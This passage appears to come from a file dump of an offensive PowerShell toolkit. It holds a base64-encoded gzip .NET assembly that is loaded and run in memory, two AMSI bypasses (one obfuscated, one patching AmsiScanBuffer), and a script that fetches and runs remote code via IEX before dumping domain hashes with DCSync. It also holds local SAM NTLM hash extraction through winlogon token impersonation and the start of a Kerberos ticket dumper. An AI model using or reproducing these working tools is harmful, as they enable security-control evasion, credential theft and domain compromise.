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'
 5 | $b64Str = $b64Str -replace '\s',''  # Remove whitespace
 6 | 
 7 | if (![string]::IsNullOrWhiteSpace($b64Str)) {
 8 |     try {
 9 |         $compBytes = [Convert]::FromBase64String($b64Str)
10 | 
11 |         if ($compBytes -and $compBytes.Count -gt 0) {
12 |             $compStream = New-Object System.IO.MemoryStream($compBytes, 0, $compBytes.Length)
13 |             $gzipStream = New-Object System.IO.Compression.GzipStream($compStream, [System.IO.Compression.CompressionMode]::Decompress)
14 |             $decompStream = New-Object System.IO.MemoryStream
15 |             $buf = New-Object byte[](4096)
16 | 
17 |             do {
18 |                 $read = $gzipStream.Read($buf, 0, $buf.Length)
19 |                 if ($read -gt 0) { $decompStream.Write($buf, 0, $read) }
20 |             } while ($read -gt 0)
21 | 
22 |             $gzipStream.Close()
23 |             $compStream.Close()
24 | 
25 |             $decompStream.Position = 0
26 |             $decompBytes = $decompStream.ToArray()
27 |             $decompStream.Close()
28 | 
29 |             $asm = [System.Reflection.Assembly]::Load($decompBytes)
30 |             $entry = $asm.EntryPoint
31 |             $Output = $entry.Invoke($null, @((,($Command -split ' '))))
32 |             $Output = $Output.Trim()
33 |             $Output | FT
34 |         } else {}} catch {}} else {}
35 | }
36 | 


--------------------------------------------------------------------------------
/Invoke-Mongoose.ps1:
--------------------------------------------------------------------------------
1 | S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
2 | 


--------------------------------------------------------------------------------
/Invoke-NETMongoose.ps1:
--------------------------------------------------------------------------------
 1 | Function Invoke-NETMongoose{
 2 | # Based on the original code by Gustav Shen
 3 | function lf{param($m,$f)$a=[AppDomain]::CurrentDomain.GetAssemblies()|?{$_.GlobalAssemblyCache-and$_.Location.Split('\')[-1]-eq'System.dll'}|%{$_.'GetType'('Microsoft.Win32.UnsafeNativeMethods')}
 4 | $t=$a.'GetMethods'()|?{$_.Name-like'Ge*P*oc*ddress'}
 5 | $t[0].'Invoke'($null,@(($a.'GetMethod'('GetModuleHandle')).'Invoke'($null,@($m)),$f))}
 6 | function g{Param($f,$d=[Void])$t=[AppDomain]::CurrentDomain.DefineDynamicAssembly([System.Reflection.AssemblyName]'R',[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I',$false).DefineType('M','Class,Public,Sealed,AnsiClass,AutoClass',[System.MulticastDelegate])
 7 | $t.DefineConstructor('RTSpecialName,HideBySig,Public',[System.Reflection.CallingConventions]::Standard,$f).SetImplementationFlags('Runtime,Managed')
 8 | $t.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$d,$f).SetImplementationFlags('Runtime,Managed')
 9 | return $t.CreateType()}
10 | $a="A";$b="msiS";$c="canB";$d="uffer"
11 | [IntPtr]$f=lf amsi.dll ($a+$b+$c+$d);$o=0
12 | $vp=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((lf kernel32.dll VirtualProtect),(g @([IntPtr],[UInt32],[UInt32],[UInt32].MakeByRefType())([Bool])))
13 | $vp.Invoke($f,3,0x40,[ref]$o)>$null
14 | $b=[Byte[]](0xb8,0x34,0x12,0x07,0x80,0x66,0xb8,0x32,0x00,0xb0,0x57,0xc3)
15 | [System.Runtime.InteropServices.Marshal]::Copy($b,0,$f,12)}
16 | Invoke-NETMongoose
17 | 


--------------------------------------------------------------------------------
/Invoke-NTDS.ps1:
--------------------------------------------------------------------------------
 1 | Function Invoke-NTDS {
 2 |     param (
 3 |     [string]$Domain = $env:USERDNSDOMAIN,
 4 |     [switch]$NoComputerHashes
 5 | )
 6 | 
 7 | $DomainControllerCheck = Get-WmiObject "Win32_ComputerSystem" | Select-Object -Expand "DomainRole"
 8 | if ($DomainControllerCheck -ne "5"){return "NotDomainController"}
 9 | 
10 | IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-Pandemonium.ps1')
11 | 
12 | $Command = '"lsaDUMp::dCsyNc /DOmaIN:' + $Domain + ' /alL /cSv"'
13 | $output = Invoke-Pandemonium -Command $Command
14 | 
15 | $lines = $output -split '\r?\n'
16 | 
17 | $Data = $lines | ForEach-Object {
18 |     $columns = $_ -split "`t"
19 |     $user = $columns[1]
20 |     $hash = $columns[2]
21 |     if ($user -and $hash) {
22 |         "$user::aad3b435b51404eeaad3b435b51404ee:$hash:::"
23 |     }
24 | }
25 | 
26 | function DumpSAM{$ErrorActionPreference = "SilentlyContinue"
27 | try{&{[void][impsys.win32]}}catch{Add-Type -TypeDefinition "using System;using System.Runtime.InteropServices;namespace impsys{public class win32{[DllImport(`"kernel32.dll`",SetLastError=true)]public static extern bool CloseHandle(IntPtr hHandle);[DllImport(`"kernel32.dll`",SetLastError=true)]public static extern IntPtr OpenProcess(uint processAccess,bool bInheritHandle,int processId);[DllImport(`"advapi32.dll`",SetLastError=true)]public static extern bool OpenProcessToken(IntPtr ProcessHandle,uint DesiredAccess,out IntPtr TokenHandle);[DllImport(`"advapi32.dll`",SetLastError=true)]public static extern bool DuplicateTokenEx(IntPtr hExistingToken,uint dwDesiredAccess,IntPtr lpTokenAttributes,uint ImpersonationLevel,uint TokenType,out IntPtr phNewToken);[DllImport(`"advapi32.dll`",SetLastError=true)]public static extern bool ImpersonateLoggedOnUser(IntPtr hToken);[DllImport(`"advapi32.dll`",SetLastError=true)]public static extern bool RevertToSelf();}}"}
28 | function IAS{[CmdletBinding()]param([Parameter(Mandatory=$true,Position=0)][scriptblock]$Process,[Parameter(Position=1)][object[]]$ArgumentList);$a=GPS -Name "winlogon"|Select -First 1 -ExpandProperty Id;if(($b=[impsys.win32]::OpenProcess(0x400,$true,[Int32]$a)) -eq [IntPtr]::Zero){$c=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}$d=[IntPtr]::Zero;if(-not [impsys.win32]::OpenProcessToken($b,0x0E,[ref]$d)){$c=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}$f=[IntPtr]::Zero;if(-not [impsys.win32]::DuplicateTokenEx($d,0x02000000,[IntPtr]::Zero,0x02,0x01,[ref]$f)){$c=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}try{if(-not [impsys.win32]::ImpersonateLoggedOnUser($f)){$c=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}& $Process @ArgumentList}finally{if(-not [impsys.win32]::RevertToSelf()){$c=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}}}
29 | try{&{[void][ntlmx.win32]}}catch{Add-Type -TypeDefinition "using System;using System.Text;using System.Runtime.InteropServices;namespace ntlmx{public class win32{[DllImport(`"advapi32.dll`",SetLastError=true,CharSet=CharSet.Auto)]public static extern int RegOpenKeyEx(IntPtr hKey,string subKey,int ulOptions,int samDesired,out IntPtr hkResult);[DllImport(`"advapi32.dll`",SetLastError=true,CharSet=CharSet.Auto)]public static extern int RegQueryInfoKey(IntPtr hkey,StringBuilder lpClass,ref int lpcbClass,int lpReserved,out int lpcSubKeys,out int lpcbMaxSubKeyLen,out int lpcbMaxClassLen,out int lpcValues,out int lpcbMaxValueNameLen,out int lpcbMaxValueLen,out int lpcbSecurityDescriptor,IntPtr lpftLastWriteTime);[DllImport(`"advapi32.dll`",SetLastError=true)]public static extern int RegCloseKey(IntPtr hKey);}}"}
30 | function GNLPH{GCI "HKLM:SAM\SAM\Domains\Account\Users"|?{$_.PSChildName -match "^[0-9A-F]{8}$"}|%{$ae=$_.PSChildName;$v=(Get-ItemProperty "HKLM:SAM\SAM\Domains\Account\Users\$ae" -Name V).V;$f=(Get-ItemProperty "HKLM:SAM\SAM\Domains\Account" -Name F).F;$xc=-join(&{"JD","Skew1","GBG","Data"|%{$ou=[IntPtr]::Zero;if([ntlmx.win32]::RegOpenKeyEx(0x80000002,"SYSTEM\CurrentControlSet\Control\Lsa\$_",0x0,0x19,[ref]$ou)){$e=[Runtime.InteropServices.Marshal]::GetLastWin32Error();throw [ComponentModel.Win32Exception]$e}$lp=New-Object Text.StringBuilder 1024;[int]$oz=1024;if([ntlmx.win32]::RegQueryInfoKey($ou,$lp,[ref]$oz,0x0,[ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,[IntPtr]::Zero)){$e=[Runtime.InteropServices.Marshal]::GetLastWin32Error();throw [ComponentModel.Win32Exception]$e}[void][ntlmx.win32]::RegCloseKey($ou);$lp.ToString()}});$md5=[Security.Cryptography.MD5]::Create();$q=[Security.Cryptography.Aes]::Create();$q.Mode=[Security.Cryptography.CipherMode]::CBC;$q.Padding=[Security.Cryptography.PaddingMode]::None;$q.KeySize=128;$k=[Security.Cryptography.DES]::Create();$k.Mode=[Security.Cryptography.CipherMode]::ECB;$k.Padding=[Security.Cryptography.PaddingMode]::None;$uu=[BitConverter]::ToInt32($v,0x0C)+0xCC;$len=[BitConverter]::ToInt32($v,0x10);$username=[Text.Encoding]::Unicode.GetString($v,$uu,$len);$uu=[Bitconverter]::ToInt32($v,0xA8)+0xCC;$bk=8,5,4,2,11,9,13,3,0,6,1,12,14,10,15,7|%{[Convert]::ToByte("$($xc[$_*2])$($xc[$_*2+1])",16)};switch($v[0xAC]){0x38{$enc_syskey=$f[0x88..0x97];$enc_syskey_iv=$f[0x78..0x87];$enc_syskey_key=$bk;$syskey=$q.CreateDecryptor($enc_syskey_key,$enc_syskey_iv).TransformFinalBlock($enc_syskey,0,16);$enc_ntlm=$v[($uu+24)..($uu+24+0x0F)];$enc_ntlm_iv=$v[($uu+8)..($uu+23)];$enc_ntlm_key=$syskey;$enc_ntlm=$q.CreateDecryptor($enc_ntlm_key,$enc_ntlm_iv).TransformFinalBlock($enc_ntlm,0,16)}0x14{$enc_syskey=$f[0x80..0x8f];$enc_syskey_key=$md5.ComputeHash($f[0x70..0x7f]+[Text.Encoding]::ASCII.GetBytes("!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%`0")+$bk+[Text.Encoding]::ASCII.GetBytes("0123456789012345678901234567890123456789`0"));$syskey=rc4 $enc_syskey $enc_syskey_key;$enc_ntlm=$v[($uu+4)..($uu+4+0x0F)];$enc_ntlm_key=$md5.ComputeHash($syskey+(3,2,1,0|%{[Convert]::ToByte("$($ae[$_*2])$($ae[$_*2+1])",16)})+[Text.Encoding]::ASCII.GetBytes("NTPASSWORD`0"));$enc_ntlm=rc4 $enc_ntlm $enc_ntlm_key}default{New-Object PSObject -Property @{Username=$username;RID=[int]"0x$ae";NTLM="31D6CFE0D16AE931B73C59D7E0C089C0"}}}$k_str_1=3,2,1,0,3,2,1|%{[Convert]::ToByte("$($ae[$_*2])$($ae[$_*2+1])",16)};$k_str_2=0,3,2,1,0,3,2|%{[Convert]::ToByte("$($ae[$_*2])$($ae[$_*2+1])",16)};$k_key_1=str_to_key $k_str_1;$k_key_2=str_to_key $k_str_2;$ntlm_1=$k.CreateDecryptor($k_key_1,$k_key_1).TransformFinalBlock($enc_ntlm,0,8);$ntlm_2=$k.CreateDecryptor($k_key_2,$k_key_2).TransformFinalBlock($enc_ntlm,8,8);$ntlm=[BitConverter]::ToString($ntlm_1+$ntlm_2)-replace '-','';New-Object PSObject -Property @{Username=$username;RID=[int]"0x$ae";NTLM=$ntlm}}}
31 | function rc4($d,$k){$r=$d;$s,$k=@(0..255),@($k*256);$j=0;0..255|%{$j=($j+$s[$_]+$k[$_])%256;$s[$_],$s[$j]=$s[$j],$s[$_]}
32 | $i=$j=0;0..($r.Length-1)|%{$i=($i+1)%256;$j=($j+$s[$i])%256;$s[$i],$s[$j]=$s[$j],$s[$i];$t=($s[$i]+$s[$j])%256;$r[$_]=$r[$_]-bxor$s[$t]};$r}
33 | function str_to_key($s) {
34 | $odd_parity=@(1,1,2,2,4,4,7,7,8,8,11,11,13,13,14,14,16,16,19,19,21,21,22,22,25,25,26,26,28,28,31,31,32,32,35,35,37,37,38,38,41,41,42,42,44,44,47,47,49,49,50,50,52,52,55,55,56,56,59,59,61,61,62,62,64,64,67,67,69,69,70,70,73,73,74,74,76,76,79,79,81,81,82,82,84,84,87,87,88,88,91,91,93,93,94,94,97,97,98,98,100,100,103,103,104,104,107,107,109,109,110,110,112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254);$0=@();$0+=bitshift $s[0]-1;$0+=(bitshift ($s[0]-band 0x01) 6)-bor(bitshift $s[1]-2);$0+=(bitshift ($s[1]-band 0x03) 5)-bor(bitshift $s[2]-3);$0+=(bitshift ($s[2]-band 0x07) 4)-bor(bitshift $s[3]-4);$0+=(bitshift ($s[3]-band 0x0F) 3)-bor(bitshift $s[4]-5);$0+=(bitshift ($s[4]-band 0x1F) 2)-bor(bitshift $s[5]-6);$0+=(bitshift ($s[5]-band 0x3F) 1)-bor(bitshift $s[6]-7);$0+=$s[6]-band 0x7F;$0[0]=$odd_parity[(bitshift $0[0] 1)];$0[1]=$odd_parity[(bitshift $0[1] 1)];$0[2]=$odd_parity[(bitshift $0[2] 1)];$0[3]=$odd_parity[(bitshift $0[3] 1)];$0[4]=$odd_parity[(bitshift $0[4] 1)];$0[5]=$odd_parity[(bitshift $0[5] 1)];$0[6]=$odd_parity[(bitshift $0[6] 1)];$0[7]=$odd_parity[(bitshift $0[7] 1)];$0}
35 | function bitshift($x, $c){return [math]::Floor($x * [math]::Pow(2, $c))}
36 | $users=IAS -Process {GNLPH};$excludedUsernames=@("Guest","DefaultAccount","WDAGUtilityAccount");foreach($user in $users){if($user.Username-notin$excludedUsernames){$output="$($user.Username):$($user.RID):aad3b435b51404eeaad3b435b51404ee:$($user.NTLM.ToLower()):::";$Output}}}
37 | DumpSAM
38 | 
39 | 
40 | 
41 | 
42 | $Data | ForEach-Object {
43 |     if ($_ -notlike "*$*") {
44 |         Write-Output $_
45 |     }
46 | }
47 | 
48 | if (!$NoComputerHashes) {
49 |     $Data | ForEach-Object {
50 |         if ($_ -like "*$*") {
51 |             Write-Output $_
52 |             
53 |             }
54 |         }
55 |     }
56 | }
57 | 


--------------------------------------------------------------------------------
/Kirby.ps1:
--------------------------------------------------------------------------------
 1 | Function Invoke-Kirby{
 2 | Set-Alias nO New-Object
 3 | Set-Alias aM Add-Member
 4 | Set-Alias wO Write-Output
 5 | $x="public"
 6 | $sn="NT.AUT.*\\"
 7 | function IAS{$p=gps winlogon|select -f 1 -exp Id;if(($h=[impsys.win32]::OpenProcess(0x400,$true,[Int32]$p))-eq[IntPtr]::Zero){$e=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}$t=[IntPtr]::Zero;if(-not[impsys.win32]::OpenProcessToken($h,0x0E,[ref]$t)){$e=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}$d=[IntPtr]::Zero;if(-not[impsys.win32]::DuplicateTokenEx($t,0x02000000,[IntPtr]::Zero,0x02,0x01,[ref]$d)){$e=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}try{if(-not[impsys.win32]::ImpersonateLoggedOnUser($d)){$e=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}$c=$([System.Security.Principal.WindowsIdentity]::GetCurrent().Name);if($c-match $sn){return $true}else{return $false}}catch{return $false}return $false}
 8 | Function LsaRegisterLogonProcess(){$LPN="User32LogonProcess";$LS=nO ticket.dump+LSA_STRING_IN;$lh=nO System.IntPtr;[System.UInt64]$SecurityMode=0;$LS.Length=[System.UInt16]$LPN.Length;$LS.MaximumLength=[System.UInt16]($LPN.Length+1);$LS.buffer=[System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($LPN);[int]$ret=[ticket.dump]::LsaRegisterLogonProcess($LS,[ref]$lh,[ref]$SecurityMode);if($ret-ne 0){$ret;$dtk=$false;return $(LsaConnectUntrusted)}return $lh}
 9 | function LsaConnectUntrusted{$lh=nO System.IntPtr;[int]$ret=[ticket.dump]::LsaConnectUntrusted([ref]$lh);if($ret-ne 0){throw "";return -1}return $lh}
10 | Function Get-lsah(){$lh=nO System.IntPtr;$sysres=IAS;if($sysres){$dtk=$true;return $(LsaRegisterLogonProcess)}else{$dtk=$false;return $(LsaConnectUntrusted)}}
